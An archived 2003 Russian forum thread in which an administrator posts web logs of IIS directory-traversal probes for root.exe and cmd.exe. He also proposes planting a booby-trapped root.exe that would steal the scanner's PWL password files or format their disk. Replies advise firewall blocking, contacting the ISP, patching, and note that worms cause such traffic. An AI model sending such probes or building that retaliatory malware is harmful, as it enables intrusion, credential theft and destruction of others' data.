форумы  помощь  поиск  регистрация  майллист  ВХОД  слежка

Вариант для распечатки		Архивированная нить - только для чтения!  Пред. тема | След. тема
Форумы OpenNET: Виртуальная конференция (Public)
Изначальное сообщение		[Проследить за развитием треда]

"Подскажите что можно сделать по борьбе с хакерами?"
Сообщение от СергейКа on 12-Апр-03, 08:49  (MSK)
Каждый день сканируют одно и тоже. Вот и пришла в голову идея Они хотят root.exe? Так может дать им его? Только с вирусом, который перекинет мне данные с их машины типа PWL или с: диск форматнет чтоб неповадно было. Если кто то встречался с подобным - киньте мне ссылку или подскажите в каком направлении искать 213.154.76.129 - - [12/Apr/2003:03:31:48 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:31:49 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:31:50 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:31:51 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:31:52 +0000] "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:31:53 +0000] "GET /_vti_bin/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:31:55 +0000] "GET /_mem_bin/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:31:56 +0000] "GET /msadc/..\../..\../..\/..а../..а../..а../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:31:58 +0000] "GET /scripts/..а../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:31:59 +0000] "GET /scripts/..ю/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:32:01 +0000] "GET /scripts/..ю╞../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:32:01 +0000] "GET /scripts/..а°../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:32:02 +0000] "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:32:06 +0000] "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:32:08 +0000] "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" 213.154.76.129 - - [12/Apr/2003:03:32:09 +0000] "GET /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
	Рекомендовать в FAQ | Cообщить модератору | Наверх

Индекс форумов | Темы | Пред. тема | След. тема

Сообщения по теме

1. "Подскажите что можно сделать по борьбе с хакерами?"
Сообщение от Понт on 12-Апр-03, 11:11  (MSK)
ты админ или кто? адрес-то один и тот же вот и закрывай его нахрен на файрволе поменяют адрес - закрывай всю подсеть
	Рекомендовать в FAQ | Cообщить модератору | Наверх

	2. "Подскажите что можно сделать по борьбе с хакерами?"
	Сообщение от СергейКа on 12-Апр-03, 11:18  (MSK)
	>ты админ или кто? > >адрес-то один и тот же >вот и закрывай его нахрен на файрволе > >поменяют адрес - закрывай всю подсеть Смешной ты право слово, этих кадров по 20 штук в день, и все либо через прокси, либо по модемам на динамическом ИП - глупо использовать кувалду против комара.
		Рекомендовать в FAQ | Cообщить модератору | Наверх

	3. "Подскажите что можно сделать по борьбе с хакерами?"
	Сообщение от Stinger on 12-Апр-03, 15:33  (MSK)
	>>ты админ или кто? >> >>адрес-то один и тот же >>вот и закрывай его нахрен на файрволе >> >>поменяют адрес - закрывай всю подсеть > >Смешной ты право слово, этих кадров по 20 штук в день, и >все либо через прокси, либо по модемам на динамическом ИП - >глупо использовать кувалду против комара. Это у тебя логи показывают сканнер безопасности xSpider... А по поводу этого "хакера", свяжись с провайдером, они его вычеслят и по балде надают (если он местный). А самый лучший метод, заклей все дыры у себя на серваке и не морочь себе голову малолетними "хакерами"...
		Рекомендовать в FAQ | Cообщить модератору | Наверх

	4. "Подскажите что можно сделать по борьбе с хакерами?"
	Сообщение от A Clockwork Orange on 12-Апр-03, 17:12  (MSK)
	>>>ты админ или кто? >>> >>>адрес-то один и тот же >>>вот и закрывай его нахрен на файрволе >>> >>>поменяют адрес - закрывай всю подсеть >> >>Смешной ты право слово, этих кадров по 20 штук в день, и >>все либо через прокси, либо по модемам на динамическом ИП - >>глупо использовать кувалду против комара. > > >Это у тебя логи показывают сканнер безопасности xSpider... >А по поводу этого "хакера", свяжись с провайдером, они его >вычеслят и по балде надают (если он местный). >А самый лучший метод, заклей все дыры у себя на серваке >и не морочь себе голову малолетними "хакерами"... Фигня все это, забить. Или на cisco выставить фильтр по соедержанию пакета, где то я видел строки фильтра. Или еще на каком фаерволе отфильтровывать все это. ВСе вышописанное, недейственно, такие скрипты могу запускаться из тысячи мест, если куча времени можешь вступать в переписку с провайдерами, есть большой плюс, изучишь ... тучу языков.
		Рекомендовать в FAQ | Cообщить модератору | Наверх

	5. "Подскажите что можно сделать по борьбе с хакерами?"
	Сообщение от AdVv on 12-Апр-03, 18:31  (MSK)
	Помоему никаким хакерством здесь и близко не пахнет. Таким образом распространяются некоторые сетевые вирусы-черви, которые пользуют дыру в IIS. Так что напиши хозяину хоста - пусть антивирусник обновит.
		Рекомендовать в FAQ | Cообщить модератору | Наверх

Удалить

Индекс форумов | Темы | Пред. тема | След. тема

Пожалуйста, прежде чем написать сообщение, ознакомьтесь с данными рекомендациями.